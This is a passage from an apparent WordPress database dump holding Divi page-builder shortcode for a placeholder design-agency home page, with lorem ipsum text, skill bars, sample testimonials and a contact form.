animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\" column_structure=\"1_2,1_2\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\" column_structure=\"1_2,1_2\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#fcd21d\" use_percentages=\"off\" _builder_version=\"3.0.87\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Award winning Design</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas metus sapien, tempus nec lectus vitae, varius porttitor turpis. Ut sit amet tincidunt nulla, nec ultrices est. Aliquam sollicitudin tempor dui, ac accumsan metus vulputate sit amet. Donec placerat rutrum tellus et.</span></p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\" column_structure=\"1_2,1_2\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Product\" use_icon=\"on\" font_icon=\"%%65%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"fade\" animation_direction=\"bottom\"][/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Branding\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.82\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"][/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\" column_structure=\"1_2,1_2\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-02 20:16:56','2020-07-02 20:16:56','',134,'https://52.66.212.87/2020/07/02/134-revision-v1/',0,'revision','',0),(159,1,'2020-07-02 21:00:57','2020-07-02 21:00:57','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.4.9\" background_color=\"#fcd21d\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/circle-background-pattern.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px|\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" hover_enabled=\"0\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.4.9\" text_font=\"Montserrat|500||on|||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_letter_spacing=\"3px\" custom_margin=\"||45px|\" animation_style=\"slide\" animation_direction=\"bottom\" hover_enabled=\"0\" locked=\"off\"]<p style=\"text-align: center;\">We are a full service</p>\n[/et_pb_text][et_pb_text _builder_version=\"4.4.9\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"60px\" header_line_height=\"1.3em\" custom_margin=\"||40px|\" animation_style=\"fade\" hover_enabled=\"0\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1 style=\"text-align: center;\">Creative<br /> <span style=\"color: #353740;\">Design Agency</span></h1>\n[/et_pb_text][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"20px\" text_line_height=\"1.8em\" header_font=\"||||||||\" custom_margin=\"||50px|\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"17%\" locked=\"off\"]<p style=\"text-align: center;\">It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has normal.</p>[/et_pb_text][et_pb_button button_text=\"Learn More\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" 